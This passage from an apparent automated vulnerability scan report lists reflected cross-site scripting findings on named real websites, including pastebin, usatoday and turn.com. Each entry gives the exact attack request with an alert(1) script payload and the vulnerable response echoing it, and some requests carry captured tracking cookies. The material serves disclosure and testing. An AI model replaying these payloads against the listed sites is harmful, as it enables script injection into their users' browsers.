Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:33:25 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:25 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:25 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:33:25 GMT
Server: lighttpd/1.4.18
Content-Length: 395

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d2011051519270862126421219180&phint=__bk_t%3d4f09c"><script>alert(1)</script>b81aaeddec&phint=__bk_k%3d&limit=4" height="0" width="0" frameborder="0">
...[SNIP]...

5.51. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fingerhut.tt.omtrdc.net
Path:	/m2/fingerhut/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload bc9c9<script>alert(1)</script>41364d59e04 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1305509219944-478846&mboxPage=1305509219944-478846&mboxCount=1&mbox=FHTOCP_welcomebc9c9<script>alert(1)</script>41364d59e04&mboxId=0&mboxTime=1305491220005&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&mboxReferrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fx1.rtb%2Ffingerhut%2Fdoubledma%2Fron%2Fctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&mboxVersion=38 HTTP/1.1
Host: fingerhut.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 210
Date: Mon, 16 May 2011 01:36:07 GMT
Server: Test & Target

mboxFactories.get('default').get('FHTOCP_welcomebc9c9<script>alert(1)</script>41364d59e04',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305509219944-478846.17");

5.52. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://i.usatoday.net
Path:	/asp/usatly/handler.ashx

Issue detail

The value of the longUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5858'%3balert(1)//02d6293dc was submitted in the longUrl parameter. This input was echoed as c5858';alert(1)//02d6293dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /asp/usatly/handler.ashx?longUrl=c5858'%3balert(1)//02d6293dc HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 138
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: private, max-age=86400
Date: Mon, 16 May 2011 01:19:47 GMT
Connection: close
Vary: Accept-Encoding

var usatlyshorturl = 'c5858';alert(1)//02d6293dc'; // Currently only the following domains are supported: usatoday.com,usatodayeducate.com

5.53. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 72b1b<script>alert(1)</script>01f0fef14a3 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=E0656072b1b<script>alert(1)</script>01f0fef14a3 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_IH_7="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRcudMd6UdHTVGVIPJjz/yF34dHT25tVh790Up6NBJPV43sAoYRKLv7Za4Rwx2/OuBlUO+TFiqzoc98k+cpjMMg5USvXrBeFN3oCTNygkzLwCEpbHvTO1DFmYTno4bvhgTyCVUCll7KXXgfUAI0Py2fGh6MPSOt7ObjB3woINiVApH0A=="; rsi_us_1000000="pUMdJc+g/xMU1j3Eq6mR0x2J+T7uFxaPzsVdi8Ni1rYm6J68l6acsXsd9OYJYVlly8cr+J2K6AddxvkNjEpT8X3w4B4lBCjXwQIbR0jlRnTHgpk5f1sQGfmFmyVEtx+gxjLU3wnYgttSfhxMbzfydi3AAGoKvCmxF7TxORX1mqADXOanLZaz6sJGSEz90RB0KeOifwnURRHhCsVk3w6bNETq9nc+k2ll9KMbb8sWgiVgH2Zd335WJFX18Hy2/BgZNsf9NM8irA1uZi6UJW+DKzXg+99MdH2//xFgX+ZPOQDsoy9Be8AFAdjuskLYUDxsUlNhyqQaWwGvJyuAuf0Ss2l0uH6jvt4FcFbTkZBk9q7caxdxw2TJZQfbfDKhb2bpjeGdZoqJ44fCKH3DoxpfXBIW3ohUSVLFElW2dztek4Fn2fadkI5nP/Lat0PGhonkfKaiqyqMWT6PSUH0tnXPvFFCQ2Evk4Yarbh4YiTvgdw/8E5sj9TdpiToNMPKRMu250cwirAHBwhZoo9S04egkJIm5Tk0Su5s9KFZoDc41rkgS7pZnikG/LfPzPlgEjldlohervfYVZ/LaMjmJuZfR6SZUqtPVd8O7nMqgFt6bf4Md0jAFU3IbNqPuCHHS/cEp3nCnspLAR4e1R+gGitqEYVA+JOiq4sp+fRtOiU1jtoQ4FRVaJP/03I9PtH0VkJpFhL7CuayYoDhdKu0ByWZy+KTL1v/OQpmY1nftZfGOHQjKSF2P1zTGfEpRqL2kw=="; rtc_d1yn=MLuB648HgV9DFVRAcMKRV8BItq+wLgaJCK6wgl48oj9LoBSPJndTC+3SWz6oSpsoBhz2GNjcf7S7fSphFBYcKsIf2/9slCRRHs5A9NFuqZhZbQLdIFwm9RF6U8URf2N/KH0qGR1QY3DxZLycbLU=; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtlR8qmZ5EYm2QQMyGpObby6k11tNu345vUZaCKjYPpg7DctEzT/YmvwSV+h+zyWJPM6bhzBtArAADE6trLuK01RUTHtoDIZGMfgWkONiixNKs3XuqReSNH/gBjg==; udm_0=MLv381MJZihn557Fg9CgawbiVA1lL/FuRN2YvTxnLmFE6w8NbGJPaUPFCwsFgR3sv7657LwRKNAmXEh2aSb0Zv5bckFYISl1fyfVVAwqoQYt9FhqVjQGjuSl8z6Qv6cnv53ckanPEOOXZwkn9RV/ihHtOHpoTy2LVEsR1+0TtypJG/O4klSyrU9gYKd0fFdaupz4d8b9Rxi9djrm40BWjcIFDUCw9gcW5BQs/64wXLGemKagzfYsk+Be/OQ5xaBZaSj3b4jGGpgM2F1qkr0iYXTLNphhYma6fAml/0UvewxClD7zldQ+WamH9ng0nRYrjN3PcYJlfkkul9U4BAGhifhxBj1sv6C4RRL6UBTL2KUx9T8V8YFXz7YPDtGbM6sgCs3RB0SA0ycbHqx2WVsbyLukuWo7YvdldaMxV/fshebvGXE1IKazvSkswdMfyeVYT15UrtqFCLGABTryXWv1F+XgNgqFTFNm1drz5UX6WcHHivrY2QGkCz6fiXlqtAAj2PQTrzRvQYY3+HAqdC/dwE6FNus7vDx+1K0MO1Vn1WWhUby27gM/6Lvnw+nLSKBM9mlSNVmKh4Cl1j5OW52264m48pkDKKkPrWJxRKzTa8xhzae+N2XhA3eQHMYIuSfo6DKhiNWS8b6W6n7VDBCgOJVgcqeSwyQO9riL8Y+OBI7v42chasKmrve6popZvLjbjISWE/8fGIxOEnCWfaty7H8syDJC8iLF+r2Pk9zRn7S7inz1SkdFk46H89ZroiU3qJ8F4oMHF00Dqpt0O0HkGEPMNMCBv6ze8LvUmIjdewmx8LI2ISHGcVDcWQcRml0Ptz3tmYMOzEcNnD/OWoGqhyV5W6e32jcAAG35EbiTDNfnpMuUqc30dB9i8xri9Uidkc3TiOUOJ3qWTz5ZJEKhbm4X9u7mxzmpya1rCbaVfzsAA6Q=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 16 May 2011 01:19:40 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 17 May 2011 01:19:40 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:19:39 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "E0656072B1B<SCRIPT>ALERT(1)</SCRIPT>01F0FEF14A3" was not recognized.
*/

5.54. http://pastebin.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pastebin.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50732"><script>alert(1)</script>d0c46a64a0 was submitted in the REST URL parameter 1. This input was echoed as 50732\"><script>alert(1)</script>d0c46a64a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico50732"><script>alert(1)</script>d0c46a64a0 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:57 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:57 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/favicon.ico50732\"><script>alert(1)</script>d0c46a64a0"/>
...[SNIP]...

5.55. http://pastebin.com/i/fixed.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pastebin.com
Path:	/i/fixed.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6806"><script>alert(1)</script>a1c2cdd2d5 was submitted in the REST URL parameter 1. This input was echoed as e6806\"><script>alert(1)</script>a1c2cdd2d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ie6806"><script>alert(1)</script>a1c2cdd2d5/fixed.css?1 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/ie6806\"><script>alert(1)</script>a1c2cdd2d5/fixed.css?1"/>
...[SNIP]...

5.56. http://pastebin.com/i/fixed.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pastebin.com
Path:	/i/fixed.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9ab5"><script>alert(1)</script>a013d73a3b1 was submitted in the REST URL parameter 2. This input was echoed as a9ab5\"><script>alert(1)</script>a013d73a3b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/fixed.cssa9ab5"><script>alert(1)</script>a013d73a3b1?1 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/i/fixed.cssa9ab5\"><script>alert(1)</script>a013d73a3b1?1"/>
...[SNIP]...

5.57. http://pastebin.com/i/style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pastebin.com
Path:	/i/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f371c"><script>alert(1)</script>d78be778a57 was submitted in the REST URL parameter 1. This input was echoed as f371c\"><script>alert(1)</script>d78be778a57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /if371c"><script>alert(1)</script>d78be778a57/style.css?9 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/if371c\"><script>alert(1)</script>d78be778a57/style.css?9"/>
...[SNIP]...

5.58. http://pastebin.com/i/style.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pastebin.com
Path:	/i/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0eb9"><script>alert(1)</script>38e6086d1db was submitted in the REST URL parameter 2. This input was echoed as c0eb9\"><script>alert(1)</script>38e6086d1db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/style.cssc0eb9"><script>alert(1)</script>38e6086d1db?9 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:48 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:48 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/i/style.cssc0eb9\"><script>alert(1)</script>38e6086d1db?9"/>
...[SNIP]...

5.59. http://pastebin.com/trends [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pastebin.com
Path:	/trends

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ddfb"><script>alert(1)</script>54be6eeb293 was submitted in the REST URL parameter 1. This input was echoed as 5ddfb\"><script>alert(1)</script>54be6eeb293 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trends5ddfb"><script>alert(1)</script>54be6eeb293 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 12233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/trends5ddfb\"><script>alert(1)</script>54be6eeb293"/>
...[SNIP]...

5.60. http://pastebin.com/trends [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pastebin.com
Path:	/trends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a94d7"><script>alert(1)</script>ffd01446e74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a94d7\"><script>alert(1)</script>ffd01446e74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trends?a94d7"><script>alert(1)</script>ffd01446e74=1 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 12237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/trends?a94d7\"><script>alert(1)</script>ffd01446e74=1"/>
...[SNIP]...

5.61. http://r.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad70c"><script>alert(1)</script>dc12055dabf was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=ad70c"><script>alert(1)</script>dc12055dabf&sp=y&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc; uid=4325897289836481830; rrs=1; rds=15110; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:36 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:22:36 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=2757321833532286343&fpid=ad70c"><script>alert(1)</script>dc12055dabf&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.62. http://r.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7525b"><script>alert(1)</script>0d9ff59c63a was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=7525b"><script>alert(1)</script>0d9ff59c63a&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc; uid=4325897289836481830; rrs=1; rds=15110; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
